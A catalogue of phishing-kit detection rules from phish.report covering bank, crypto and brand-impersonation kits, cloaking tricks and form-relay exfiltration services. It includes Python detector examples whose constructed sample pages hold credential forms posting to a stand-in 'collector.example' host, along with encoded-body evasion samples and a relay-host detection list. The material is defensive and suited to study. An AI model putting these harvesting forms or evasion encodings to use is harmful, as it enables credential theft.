IOK Rules

BBVA Phishing Kit aeng1e8e

Detects a BBVA (Banco Bilbao Vizcaya Argentaria) phishing kit deployed often on replit.com.

Vitalik Buterin fake crypto giveaway cbn4xt8m

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. It asks you to send coins to a wallet to have them doubled.

BazhanWang Website Copier

Detects the BazhanWang website copier.

Solana cryptocurrency wallet drainer - tokenup

Detects a Solana cryptocurrency wallet drainer that fakes the number of minted NFTs to initiate Fear of Missing Out (FOMO) against the victim.

Banco del Pacífico Phishing Kit 1kzes5jt

Detects a Banco del Pacífico phishing kit deployed often on replit.com.

Facebook Phishing Kit 54b8f7e

Detects a Facebook phishing kit.

Exfiltration using formpost.app

formpost.app is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Square Enix FFXIV Gil Phishing Kit

Detects a phishing kit targeting square-enix.com with a fake FFXIV forum gil giveaway. Phishing kit consists of two pages, a forum page and a login page.

Steam Phishing Kit 4f8189ec

Steam Phishing Kit that uses a fake Steam login window to steal user credentials.

ThemeTags Template Service

Detects page templates made by ThemeTags. Services like this are commonly abused by phishing pages.

Asli Crypto Drainer ea8f67e

Detects a family of crypto drainers that utilises a similarly structured landing page.

Okta ("0ktapus"/"Scatter Swine") phishing kit

Okta is a Single Sign-On (SSO) provider used by many enterprises, and this phishing kit targets those enterprises. It aims to steal the victim's email address, SSO password, and MFA details. To lower the victim's suspicion this kit (like many) includes details specific to the targeted company, e.g. their name and logo. However, unlike similar kits, this is hardcoded per instance of the phishing site and isn't dynamic based on the victim's email.

![Screenshot of one of these camouflaged Okta phishing kits (in this case, actually targeting Okta's own employees). [Via urlscan.io](https://urlscan.io/result/63fc7edd-116c-4128-a934-8ad6c9ad76e2/)](/static/63fc7edd-116c-4128-a934-8ad6c9ad76e2-BIDTSTDO.png)

The same frontend code (HTML, CSS, and JS) is deployed regardless of the company being targeted, but the company name and logo are provided by the C2 server.

### Capabilities

From analysing the code it appears this kit is set up to:

* Steal email address and password
* Capture MFA codes
* Push the download of a (trojanized?) remote desktop tool `AnyDesk.exe`

### Timeline

So far, the earliest observed appearance of this campaign was on July 1st ([urlscan.io](https://urlscan.io/result/4125359d-3fea-4161-b0a9-bed1e3c04e16)). This is a slightly earlier version of the phishing kit (referencing slightly different JS files) and was last seen on July 13th. The more recent version of the kit (using the JS filenames referenced in this rule) was first observed on [July 17th](https://urlscan.io/result/0c7aba52-edf4-4280-9bc5-783fb8c93d87/).

### Attack Infrastructure

Unlike many less sophisticated kits, this isn't deployed on a PHP hosting provider but is instead deployed on virtual machines (usually provided by Digital Ocean or Vultr).

* Frontend assets (HTML/JS/CSS) are loaded from the domain itself
* The config (for example, which logo to display) is loaded from a separate, non-HTTPS endpoint hosted on port 8080 on the same server

```mermaid
graph LR
    subgraph C2[Attack Infrastructure]
        Domain[Lookalike Domain] --> IP[Server IP]
    end
    Browser[Victim's Browser] -->|Load frontend: GET https://domain| Domain
    Browser -->|Fetch name and logo: GET http://ip:8080/api/app/settings| IP
```

Most infrastructure is unique to each attack but there's occasionally some crossover:

* [45[.]63[.]39[.]151](https://urlscan.io/ip/45.63.39.151) has been seen targeting multiple companies.
* [mailchimp-help[.]com](https://urlscan.io/domain/mailchimp-help.com) has been observed targeting multiple companies.

Luno crypto exchange phishing kit beb8d53

Luno crypto exchange phishing kit that has a high entropy string set as the `origin-trial` value

Camouflaged Okta kit (old)

An older version of the Okta phishing kit [described here](https://phish.report/IOK/indicators/okta-5844ad4)

Davivienda Phishing Kit 2j5dxddh

Detects a Davivienda phishing kit deployed often on replit.com targeting Colombian citizens.

Dubai Islamic Bank Phishing Kit e6f3d238

Dubai Islamic Bank Phishing Kit that uses a fake login page

Mark of the Web

The "Mark of the Web" is an Internet Explorer security feature: an HTML comment that the browser (and browsers that copy its behaviour) inserts into a page saved with the "Save webpage" feature. The comment records the original URL the HTML was saved from, so on a phishing page it gives away the legitimate site the kit was cloned from.
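
Parsing that comment for a clone check, as an added example (this is not phish.report's rule code). It relies on the comment format Internet Explorer writes, `<!-- saved from url=(NNNN)URL -->`, where `NNNN` is the zero-padded decimal length of the URL; the sample HTML and the served hostname are constructed for the example.

```python
import re
from typing import Optional
from urllib.parse import urlsplit

# Internet Explorer writes the Mark of the Web as an HTML comment whose URL is
# prefixed with the URL's length as a zero-padded, four-digit decimal number.
MOTW_RE = re.compile(r"<!--\s*saved from url=\((\d{4})\)(\S+?)\s*-->", re.IGNORECASE)


def extract_motw(html: str) -> Optional[dict]:
    """Return the first Mark of the Web found in `html`, or None.

    The result carries the recorded URL, its hostname, and whether the declared
    length matches the URL (a mismatch means the comment was hand-edited or
    truncated rather than written by the browser).
    """
    m = MOTW_RE.search(html)
    if m is None:
        return None
    declared_len, url = int(m.group(1)), m.group(2)
    return {
        "url": url,
        "host": urlsplit(url).hostname or "",
        "length_ok": declared_len == len(url),
    }


def cloned_from_other_site(html: str, served_host: str) -> bool:
    """True when the page carries a MOTW pointing at a host other than the one serving it.

    `about:internet` is the special value used to mark local files as internet
    content; it names no origin, so it is not treated as a clone indicator.
    """
    motw = extract_motw(html)
    if motw is None or motw["url"].lower() == "about:internet":
        return False
    return motw["host"].lower() != served_host.lower()


# Constructed sample: a login page saved from the real bank's site and re-hosted
# on a lookalike domain. 32 is the length of the recorded URL.
SAMPLE_CLONE = """<!DOCTYPE html>
<!-- saved from url=(0032)https://login.example-bank.test/ -->
<html><head><title>Sign in</title></head>
<body><form method="post" action="send.php"><input name="user"><input name="pass" type="password"></form></body></html>
"""

if __name__ == "__main__":
    print(extract_motw(SAMPLE_CLONE))
    print(cloned_from_other_site(SAMPLE_CLONE, "login-example-bank.test"))
```

The length prefix is worth checking: kit authors who edit the comment by hand (or strip part of the URL) usually leave the original count behind, which is itself a sign the page has been tampered with after saving.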

Shopify phishing kit 89NDeg

Shopify phishing kit containing a high-entropy CSRF token which should be a high quality indicator.

Bancolombia Phishing Kit 68a8d3f

Detects a Bancolombia phishing kit targeting Spanish speaking users. Commonly deployed on `replit.com`.

Fake crypto giveaway coin selection cxlw6bu4

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. Sometimes the scammer will pick a specific cryptocurrency to target, but in this case they decided to add a menu where the user can select a specific coin.

NordPass Phishing Kit 79fa7dc3

NordPass Phishing Kit that uses a fake login page to steal user credentials.

Patelco phishing kit 48ba653f

Patelco phishing kit which uses the same stylesheet and form error id across various domains.

Shopify phishing kit c546c6a9

Shopify phishing kit containing a high-entropy device identifier which should be a high quality indicator.

Bancor Phishing Kit 5bb0b5u3

Detects a Bancor phishing kit deployed often on replit.com.

Base64 & URL-encoded document body

To evade static analysis, the document body can be wrapped in several JavaScript decoding functions such as `decodeURIComponent` and `atob`, so the real markup only exists once the script has run. This helps defeat simple scanners which don't evaluate JavaScript.

GOVUK m3dular Phishing Kit ea8f67e

Detects a GOVUK phishing kit targeting citizens of the UK. The kit was developed by a user under the alias 'm3dular' (https://twitter.com/JCyberSec_/status/1575054303873486848); kit intelligence provided by @JCyberSec_.

HTTrack Website Copier

HTTrack is an open source tool to save a website and all its dependencies to disk. It's used by phishers to quickly clone a target website to get a pixel-perfect clone they can adapt into a phishing kit. It's particularly liked by phishers because it tries to ensure that *all* resources are saved offline, and none are left being loaded from the original server.

Hypixel Phishing Kit b03e14c

Detects a Hypixel phishing kit being pushed in-game as well as across Discord.

Shopify phishing kit YgjX6

Shopify phishing kit containing a high-entropy CSP nonce which should be a high quality indicator.

Nuevo Banco del Chaco Phishing Kit ri0z68ca

Detects a Nuevo Banco del Chaco phishing kit using a form action URL and a CSRF token that only appears in this kit. Deployed often on replit.com.

Shopify phishing kit 45ca55e3

Shopify phishing kit containing a high-entropy device identifier which should be a high quality indicator.

Adobe Phishing Kit 5c70696

Adobe phishing kit which uses the same `template` element `id` attribute as well as the same value inside the `noscript` tags.

Banco de la República (eBROU) Phishing Kit g5d6u78z

Detects a Banco de la República phishing kit using a form action URL and CSS files that only appear in this kit. Deployed often on `replit.com`.

Banco Promerica Phishing Kit ef73ish1

Detects a Banco Promerica phishing kit with images and form action URL that only appear in this kit. Deployed often on `replit.com`.

Banco Santa Fe phishing kit 9d6d57a2

Banco Santa Fe phishing kit which uses the same CSS and JS files.

Facebook phishing kit displaying a faked post

A Facebook phishing kit displaying a faked post

Fake crypto giveaway coin selection b791myo4

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. Sometimes the scammer will pick a specific cryptocurrency to target, but in this case they decided to add a menu where the user can select a specific coin.

Banco AV Villas Phishing Kit a5lnamb9

Detects a Banco AV Villas phishing kit deployed often on replit.com targeting Colombian citizens.

Facebook phishing kit displaying a login form

A Facebook phishing kit displaying a login form

Microsoft Phishing Kit EwNaWJpB

Detects a Microsoft phishing kit in Spanish, targeting the citizens of Argentina.

Bank of Nova Scotia (Scotiabank) Phishing Kit TYnAqzTX

Detects a phishing kit for the Bank of Nova Scotia (Scotiabank) targeting Spanish speaking users. Deployed often on replit.com.

Discord Hypesquad phishing kit strolly

Discord Hypesquad phishing kit containing a comment left behind by the supposed developer of the kit, as well as a unique nonce value.

DPD Phishing Kit 1550321

Detects a DPD phishing kit using the same fake parcel ID to lure victims in, additionally reuses the same file names and paths for various kit assets.

Ethereum cryptocurrency wallet drainer - settings

Detects an Ethereum cryptocurrency wallet drainer that includes a separate file, `settings.js`, to configure how it sweeps the victim's wallet.

Elon Musk fake crypto giveaway xfve5qjx

Detects a scam giveaway landing page which claims to host a large cryptocurrency event. It asks you to send coins to a wallet to have them doubled.

Generic Email ec34bc68

A generic email phishing kit loading CSS from an appspot project using a hard-coded access token.

123 Reg phishing kit 63c26

123 Reg phishing kit containing a high-entropy CSRF token which should be a high quality indicator.

Banco de Galicia Phishing Kit npy0f6km

Detects a different Banco de Galicia phishing kit deployed often on replit.com.

Discord Phishing Kit 664a17b

Discord phishing kit that uses an external application invite as a lure, as well as the real DiscordServer Discord bot logo to make it seem legitimate. Once the user clicks the button labelled Authorize it opens a pop-up window that (poorly) mimics the Discord login page. This rule uses the fact that the same CSS file name is used across all domains that use this kit.

Discord oAuth2 Scam u8eviyps

Detects a Discord oAuth2 scam confirmation page, which is often used in combination with social engineering to get the user to authorize for a spam application. This for example enables the attacker to add the victims into further scam/advertised servers using the 'guilds.join' scope.

Itaú Unibanco Phishing Kit s8hx648o

Detects a different Itaú Unibanco phishing kit. Discovered as a result of this being deployed on Replit.com.

"Validate your account" countdown timer

This phishing kit (reported on by Cofense in 2022, but first seen on urlscan.io in 2018) has a live countdown until a user's email is supposedly "deleted from our server".

Exfiltration using getform.io

getform is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Microsoft Phishing Kit rxkr4n3b

Detects a poorly designed and simple Microsoft phishing kit. Discovered as a result of this being deployed on Replit.com.

rot13 encoded body

To evade static analysis, the document body can be returned with each character rotated by some fixed amount, with JavaScript decoding it and appending it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.

Shopify phishing kit NCv2F

Shopify phishing kit containing a high-entropy CSP nonce which should be a high quality indicator.

Banco Galicia Phishing Kit bd53a32

Detects a Banco Galicia phishing kit deployed quite often on `replit.com`.

Banco de Galicia Phishing Kit vyk7k7oo

Detects a different Banco de Galicia phishing kit deployed often on `replit.com`. This kit uses JavaScript to dynamically load the login form HTML after you click on a SVG.

Coinbase clone generic

Detects a cloned version of an older Coinbase website that still carries the `amplitude.js` API key and the Google Site Verification keys Coinbase used at the time.

DHL Phishing Kit f8e6d46

Detects a DHL phishing kit that has several indicators that are exclusive to the kit itself, such as the endpoint where the credentials are exfiltrated to, and the name of credit card validation function.

Facebook Phishing Kit 887906f

Detects a Facebook phishing kit targeting Vietnamese users, using sexual lures such as 'Vietnamese Sexy Beauty Group'.

Commbank phishing kit displaying a fake login

Commbank phishing kit displaying a fake login

Facebook Phishing Kit 7d71c1c

Detects a Facebook phishing kit targeting Polish speaking users. It uses the same login form structure across all domains as well as the same name for the logo file.

Fake Chrome error page

The Chrome error page HTML is built into the browser: you should never see it in the response from a website. This is a clear sign that the site is employing cloaking/anti-analysis techniques.

UPS Phishing Kit 69b689e

Detects a UPS phishing kit using a fake parcel ID to lure victims in. It additionally has a high entropy string that does not change assigned as the `data-upstoken` attribute of an HTML element within the page, possibly left behind when the original UPS page was cloned.

Banco de la República Phishing Kit eec45a8

Detects a phishing kit targeting Banco de la República (eBROU), which is often deployed on `replit.com`. It uses `api.ipify.org` to fetch the victim's IP. Harvested credentials are delivered into the scammer's Telegram channel.

Bancolombia Phishing Kit 3kyj5nlh

Detects a different Bancolombia phishing kit deployed often on replit.com targeting Colombian citizens.

Microsoft Phishing Kit be5a6fa

Detects a Microsoft phishing kit targeting Spanish speaking users.

Microsoft Tech Support Kit d94c3cf

Detects a Microsoft tech support kit targeting Japanese speaking users. It uses the same name for the warning audio file as well as the same `class` attribute value on the banner elements.

SMBC Phishing Kit 9776441

Detects a SMBC phishing kit targeting Japanese users.

Steam phishing kit 8c89c4f

Steam phishing kit containing an image URL that only appears in phishing pages, additionally uses Discord Nitro as a lure.

1Password phishing kit - 191635

1Password phishing kit cloned from the legitimate `1password.com` login page using Save Page WE. The first detection was on August 16th although evidence in the kit (the Save Page WE `savepage-date` timestamp) suggests it was created August 11th. Like many similar phishing kits, credentials are posted to `send.php` and then the victim is redirected to the `1password.com` login form.

Bancolombia Phishing Kit aUwvKPIV

Detects a phishing kit targeting Bancolombia, which is often deployed on `replit.com`. Uses `api.ipify.org` to fetch the victim's IP. Harvested credentials are delivered into the scammer's Telegram channel.

Facebook Phishing Kit 54b8f7e Landing Page

Detects the landing page of this specific phishing kit.

reCAPTCHA

To make it harder for analysts to get a good capture of a phishing site, some are using Google's reCAPTCHA service.

Save Page WE website saver

Save Page WE is a Chrome extension used by phishers to clone a target website and save it as a single HTML file. Unlike HTTrack (another commonly used tool):

* It's a browser extension so doesn't require any additional tools to be installed.
* It saves pages as a single HTML file (with all assets embedded in it) which makes the resulting kit more portable and easier to deploy.

Scotiabank Phishing Kit 76fc8cb

Detects a Bank of Nova Scotia (Scotiabank) phishing kit targeting Spanish speaking users. Commonly deployed on `replit.com`.

SMBC Phishing Kit 10ddf87

Detects a SMBC phishing kit targeting Japanese users.

BBVA Phishing Kit k3dums5h

Detects a BBVA (Banco Bilbao Vizcaya Argentaria) phishing kit deployed often on replit.com.

Facebank Phishing Kit 0y8ysfop

Detects a Facebank phishing kit targeting citizens of Puerto Rico. Discovered as a result of this being deployed on Replit.com.

Facebook phishing kit with peculiar opengraph tags

A Facebook phishing kit which includes some peculiar OpenGraph tags originally from https://www.jpl.nasa.gov/news/testing-proves-its-worth-with-successful-mars-parachute-deployment

Generic crypto scam f634ac3

Generic Crypto Scam phishing kit using the same Smart Support Chat API key on different domains.

Meta Phishing Kit 506188c

Detects a phishing kit targeting Meta products, utilising the false copyright infringement appeal scam.

Microsoft Outlook Phishing Kit 9e75296

Detects a Microsoft Outlook phishing kit targeting Spanish speaking users.

Banco Atlántida Phishing Kit dxde4jyt

Detects a Banco Atlántida phishing kit deployed often on replit.com.

Banco del Pacífico Phishing Kit bl54hwhz

Detects a different Banco del Pacífico phishing kit deployed often on replit.com.

Bookmark Grabber bf623f6

Detects a phishing page that leverages the Dyno discord bot as a lure to install a malicious browser bookmark to steal the victim's Discord token.

Exfiltration using FormSubmit.co

FormSubmit is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Hex-encoded document body

To evade static analysis, the document body can be returned hex encoded in the response, with JavaScript decoding it and appending it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.

Mobirise Website Builder

Detects signatures left behind by the Mobirise Website Builder.

Exfiltration using ActionForms

ActionForms is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

An Post Phishing Kit 7b94e511

Detects an An Post phishing kit that uses the same fake tracking ID across multiple domains.

Banco de la Nación Phishing Kit 0blz45du

Detects a Banco de la Nación phishing kit using a form action URL and a button ID that only appear in this kit. Deployed often on `replit.com`.

Santander Phishing Kit 5d1468e

Detects a Santander phishing kit targeting Polish victims, this kit uses the website cloner browser extension known as [WebScrapBook](https://chrome.google.com/webstore/detail/webscrapbook/oegnpmiddfljlloiklpkeelagaeejfai?hl=en) in order to clone the original page. Github: https://github.com/danny0838/webscrapbook

SingleFile website cloner

SingleFile is a Chrome extension allowing you to save a complete webpage (HTML, CSS, JS, etc.) into a single file.

BBVA Phishing Kit dd072db

Detects a Banco Bilbao Vizcaya Argentaria (BBVA) phishing kit targeting Argentinian users.

Generic crypto scam 0694191

Generic Crypto Scam phishing kit that includes a reference to the owner of the website via an HTML link tag.

Microsoft Phishing Kit zuu2wvfc

Detects a Microsoft phishing kit with a lot of entropy, making it easy to detect. Discovered as a result of this being deployed on Replit.com.

ipapi

ipapi is a GeoIP service that returns the country code and other information for an IP address. It's regularly used by phishing kits which want to hide themselves from analysts outside the country they're targeting. This is a very naive approach (often the entire phishing site is loaded and then immediately redirected away from), but it is often enough to evade basic sandboxes.

Microsoft Tech Support Kit 0589be7

A Microsoft tech support kit containing an audio file used across many different domains, as well as a JS function that reads the phone number from the URL parameters.

USPS Phishing Kit 9514901

Detects a USPS phishing kit that uses the same fake tracking ID & same stylesheet on every phish.

Shopify phishing kit f7ejw

Shopify phishing kit containing a high-entropy CSRF token (and a CSP nonce!) which should be a high quality indicator.

Exfiltration using NoCodeForm

NoCodeForm is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Santander Phishing Kit 85b6cae

Detects a Santander phishing kit targeting Spanish speaking users.

S-Pankki phishing kit d612de8e

S-Pankki phishing kit which uses the same hidden value across various domains.

Exfiltration using submit-form

submit-form is a service that takes HTML form submissions and sends the results to an email address, online dashboard, or webhook, depending on how the threat actor configures it. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

WebScrapBook website cloner

WebScrapBook is a chrome extension used by phishers to clone target websites. Github: https://github.com/danny0838/webscrapbook

Banco Falabella Phishing Kit 5fed617

Detects a phishing kit targeting Banco Falabella (Colombia) users. Deployed often on `replit.com`.

Cazanova phishing kit

Cazanova is the alias of a prolific phishing kit creator. Lucky for us, they like to sign their work by using `cazanova` for their cookie name rather than the default `PHPSESSID`, which makes it simple to identify their work.

Exfiltration using Form2Chat

Form2Chat is a service that takes HTML form submissions and sends the results to an email address or instant messenger service. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.

Metamask Phishing Kit 604ec65

Metamask phishing kit built with Webflow, which lets us flag it because the same Webflow site key appears in every phish.

Microsoft Phishing Kit 544eva7

Detects a Microsoft phishing kit targeting Spanish speaking users.

Office 365 Phishing Kit l03TtM

Detects a phishing kit targeting Office 365 using a fake login form. It doesn't attempt to visually mimic the official login pages, allowing it to evade common detection engines.

Bancolombia Phishing Kit GM866x

Detects a phishing kit targeting Bancolombia with a simple centered login form. This was detected as a result of this kit being deployed on Replit.

Ethereum cryptocurrency wallet drainer - Iil1ililIl1iIl1ill1Ilii

Detects an Ethereum cryptocurrency wallet drainer that has a constant variable named Iil1ililIl1iIl1ill1Ilii.

Fake Not Found page

A common way for phishing sites to avoid detection is by presenting a fake 404 error page when requested with the "wrong" User Agent (or from the wrong GeoIP location). These fake error pages exactly mimic the HTML of an Apache 404 page, but unless the threat actor has configured their site to hide it, there are two giveaways that it's fake:

- It sends an `X-Powered-By: PHP` header
- It sets a `PHPSESSID` cookie

These are both clear evidence that the 404 page has been generated by PHP and not by Apache.
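
Checking a captured response for both giveaways, as an added example (not phish.report's rule code); it also covers the Cazanova cookie-name signature described earlier on this page. Headers are modelled as a list of (name, value) pairs so repeated `Set-Cookie` headers survive; the responses below are constructed for the example, and the Apache error body is the stock one the fake pages copy.

```python
import re
from typing import List, Optional, Tuple

Headers = List[Tuple[str, str]]

# Body of the stock Apache 404 page that the fake error pages copy.
APACHE_404_RE = re.compile(
    r"<title>\s*404 Not Found\s*</title>.*?<h1>\s*Not Found\s*</h1>",
    re.IGNORECASE | re.DOTALL,
)


def header(headers: Headers, name: str) -> Optional[str]:
    """First value of header `name` (case-insensitive), or None."""
    for key, value in headers:
        if key.lower() == name.lower():
            return value
    return None


def cookie_names(headers: Headers) -> List[str]:
    """Names of every cookie the response sets."""
    names = []
    for key, value in headers:
        if key.lower() == "set-cookie":
            names.append(value.split(";", 1)[0].split("=", 1)[0].strip())
    return names


def is_fake_php_404(status: int, headers: Headers, body: str) -> bool:
    """True when an Apache-looking 404 was evidently generated by PHP.

    Apache's own error document is produced by the server, so a PHP engine
    header or a PHP session cookie on it betrays a script impersonating it.
    """
    if status != 404 or not APACHE_404_RE.search(body):
        return False
    powered_by = (header(headers, "X-Powered-By") or "").upper()
    return powered_by.startswith("PHP") or "PHPSESSID" in cookie_names(headers)


def is_cazanova_kit(headers: Headers) -> bool:
    """The Cazanova kits rename the PHP session cookie to `cazanova`."""
    return "cazanova" in (name.lower() for name in cookie_names(headers))


# Constructed responses for the example.
APACHE_404_BODY = (
    '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n'
    "<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n"
    "<p>The requested URL was not found on this server.</p>\n</body></html>\n"
)
CLOAKED_RESPONSE: Headers = [
    ("Server", "Apache"),
    ("X-Powered-By", "PHP/7.4.33"),
    ("Set-Cookie", "PHPSESSID=9c1f8a2b7e3d; path=/"),
    ("Content-Type", "text/html; charset=UTF-8"),
]
GENUINE_404: Headers = [("Server", "Apache"), ("Content-Type", "text/html; charset=iso-8859-1")]
CAZANOVA_LOGIN: Headers = [("Set-Cookie", "cazanova=3f0e9a; path=/"), ("Content-Type", "text/html")]

if __name__ == "__main__":
    print(is_fake_php_404(404, CLOAKED_RESPONSE, APACHE_404_BODY))
    print(is_fake_php_404(404, GENUINE_404, APACHE_404_BODY))
    print(is_cazanova_kit(CAZANOVA_LOGIN))
```

Treat a hit as an indicator rather than proof: a legitimate PHP application with a custom `ErrorDocument` that reproduces Apache's markup would trip the same check, which is why the rule pairs it with the cloaking context (wrong User Agent or GeoIP) rather than firing on the headers alone.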

Steam phishing kit 4540135

Steam phishing kit containing an image (sha256: `8c89c4f3023d02b04197a30ca20f42ca7eb2634e1432ffff7b9d641a1f71a066`) that only appears in phishing pages. It uses Discord Nitro as a lure to make the victim willingly give away their login credentials.

Wise Phishing Kit d777126

Wise phishing kit which uses the same sentry.io API key across various domains.

KuCoin Phishing Kit 8fo0kgp3

Detects a KuCoin phishing kit deployed often on replit.com.

Amazon Phishing Kit 28bd59a

Detects an Amazon phishing kit targeting Japanese users. This kit is dynamically generated by JavaScript.

Avis Phishing Kit 0fbd3ca

Detects an Avis phishing kit targeting Turkish users.

Banco Davivienda Phishing Kit 067fef0

Detects a Banco Davivienda phishing kit deployed often on replit.com.

Class attribute obfuscation

Detects an obfuscation technique found being used by a TrustWallet phishing kit where it appends several repeating groups of characters to the class attribute of all HTML elements in the page.

Coinsbit Phishing Kit a4a01a8

Detects a Coinsbit phishing kit.

Exodus Wallet Phishing Kit

Detects an Exodus Wallet cryptocurrency wallet drainer that includes a function to validate the BIP39 recovery phrase entered.

Base64-encoded document body

To evade static analysis, the document body can be returned base64 encoded in the response, with JavaScript decoding it and appending it to the DOM. This helps defeat simple scanners which don't evaluate JavaScript.
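
The four encoded-body rules on this page (base64, base64 & URL-encoded, hex, and rot13) all come down to the same analyst move: pull every long string literal out of the page's scripts, try each decoding, and keep the ones that turn into HTML. The block below does that as an added example (not phish.report's rule code). The hidden form, the loader pages, and the JavaScript helper names `hex2str` and `rot13` are constructed for the example and are not taken from any kit; the page's own rule covers whatever decoder a kit actually ships.

```python
import base64
import binascii
import re
from typing import Iterator, List, Tuple
from urllib.parse import quote, unquote

# Quoted JavaScript string literals of 64+ characters with no escapes or nested
# quotes of the same kind; shorter or escaped strings are rarely a whole page.
STRING_LITERAL_RE = re.compile(r'"([^"\\]{64,})"|\'([^\'\\]{64,})\'')
HEX_RE = re.compile(r"(?:[0-9a-fA-F]{2})+")
BASE64_RE = re.compile(r"[A-Za-z0-9+/=\s]+")
# Markup we expect to surface once a hidden document body is decoded.
HTML_MARKER_RE = re.compile(r"<(?:html|head|body|form|input|script|div)\b", re.IGNORECASE)


def rotate_letters(text: str, shift: int) -> str:
    """Caesar-rotate ASCII letters by `shift`; everything else is untouched."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr((ord(ch) - 97 + shift) % 26 + 97))
        elif "A" <= ch <= "Z":
            out.append(chr((ord(ch) - 65 + shift) % 26 + 65))
        else:
            out.append(ch)
    return "".join(out)


def decode_candidates(literal: str) -> Iterator[Tuple[str, str]]:
    """Yield (technique, decoded text) for each encoding the literal could carry."""
    if HEX_RE.fullmatch(literal):
        yield "hex", bytes.fromhex(literal).decode("utf-8", "replace")
    if BASE64_RE.fullmatch(literal):
        try:
            text = base64.b64decode(literal).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            text = ""
        if text:
            yield "base64", text
            if "%" in text:
                # atob() followed by decodeURIComponent(): a URL-encoding layer
                # underneath the base64 one.
                yield "base64+urlencoded", unquote(text)
    # Letter rotation by any fixed amount (rot13 is the usual choice).
    for shift in range(1, 26):
        yield f"rot{shift}", rotate_letters(literal, shift)


def find_hidden_markup(page: str) -> List[Tuple[str, str]]:
    """Return (technique, decoded body) for every long literal that decodes to HTML."""
    hits = []
    for m in STRING_LITERAL_RE.finditer(page):
        literal = m.group(1) or m.group(2)
        for technique, text in decode_candidates(literal):
            if HTML_MARKER_RE.search(text):
                hits.append((technique, text))
                break
    return hits


# Constructed sample: the real phishing form each loader hides. hex2str and
# rot13 are placeholder JavaScript helper names, not taken from any kit.
SECRET_BODY = (
    '<html><body><form action="https://collector.example/post" method="post">'
    '<input name="user"><input name="pw" type="password"></form></body></html>'
)
SAMPLE_PAGES = {
    "base64": '<script>document.write(atob("%s"))</script>'
    % base64.b64encode(SECRET_BODY.encode()).decode(),
    "base64+urlencoded": '<script>document.write(decodeURIComponent(atob("%s")))</script>'
    % base64.b64encode(quote(SECRET_BODY, safe="").encode()).decode(),
    "hex": '<script>document.write(hex2str("%s"))</script>' % SECRET_BODY.encode().hex(),
    "rot13": "<script>document.write(rot13('%s'))</script>" % rotate_letters(SECRET_BODY, 13),
}

if __name__ == "__main__":
    for name, page in SAMPLE_PAGES.items():
        for technique, body in find_hidden_markup(page):
            print(f"{name:18} -> {technique}: {body[:40]}...")
```

Decoding blindly and then looking for markup is deliberate: it does not depend on recognising `atob`, `unescape`, or whatever helper the kit author wrote, and the same loop recovers the form action and exfiltration endpoint that a scanner without a JavaScript engine never sees. The rot13 rule on this page is a special case of the rotation loop; trying all 25 shifts costs little and catches kits that pick a different constant.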

Discord Nitro phishing kit 7a09ee6

Discord Nitro phishing kit containing a reused image asset.

Exfiltration using formspree.io

Formspree is a service that takes HTML form submissions and sends the results to an email address. It can be used by threat actors building "serverless" phishing pages i.e. where they don't have a backend server that can send emails or store logs.
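
The form-relay rules on this page (formpost.app, getform.io, FormSubmit.co, formspree.io and the others) all reduce to one question about a captured page: where does each `<form>` post to? The block below answers it as an added example (not phish.report's rule code). It assumes that a kit using one of these services points its form `action` at the service's own hostname, and only the four relay domains actually named on this page are listed; the sample page and its hostname are constructed for the example.

```python
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import urlsplit

# Form-relay services named on this page. Assumption for the example: a kit
# using one of them points its form action at that service's own hostname.
FORM_RELAY_HOSTS = {"formpost.app", "getform.io", "formsubmit.co", "formspree.io"}


class FormActionCollector(HTMLParser):
    """Collects the `action` attribute of every <form> (empty string when absent)."""

    def __init__(self) -> None:
        super().__init__()
        self.actions: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            self.actions.append(dict(attrs).get("action") or "")


def form_actions(html: str) -> List[str]:
    parser = FormActionCollector()
    parser.feed(html)
    parser.close()
    return parser.actions


def _is_relay(host: str) -> bool:
    return any(host == relay or host.endswith("." + relay) for relay in FORM_RELAY_HOSTS)


def classify_forms(html: str, page_host: str) -> List[Dict[str, str]]:
    """Label each form by where its submission goes relative to the page itself.

    Relative actions (e.g. `send.php`) stay on the phishing host; a relay host
    means a serverless kit; any other host is an off-site collector.
    """
    results = []
    for action in form_actions(html):
        host = (urlsplit(action).hostname or "").lower()
        if not host or host == page_host.lower():
            verdict = "same-origin"
        elif _is_relay(host):
            verdict = "third-party-relay"
        else:
            verdict = "off-site"
        results.append({"action": action, "host": host, "verdict": verdict})
    return results


# Constructed sample: a credential form posted through a relay, a conventional
# kit form posting to its own send.php, and a card form sent to another host.
SAMPLE_HTML = """<html><body>
<form action="https://formspree.io/f/abcd1234" method="POST">
  <input name="email"><input name="password" type="password">
</form>
<form action="send.php" method="post"><input name="otp"></form>
<form action="https://collector.example/post" method="post"><input name="cc"></form>
</body></html>"""

if __name__ == "__main__":
    for row in classify_forms(SAMPLE_HTML, "secure-login.example"):
        print(row)
```

For takedown work the relay verdict is the useful one: the relay provider, not the hosting provider, holds the account that receives the stolen credentials, so it is a second party to report to alongside the host.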

HSBC phishing kit ea738a3

HSBC phishing kit which uses the same fake login detected HTML element across various domains.

Santander Phishing Kit 951d27d

Detects a Santander phishing kit targeting Spanish speaking users.

Facebook Account Recovery Phishing Kit 0e420f8

Detects a Facebook phishing kit, telling the victim to enter their details to reactivate their account.

Santander Phishing Kit d639dea

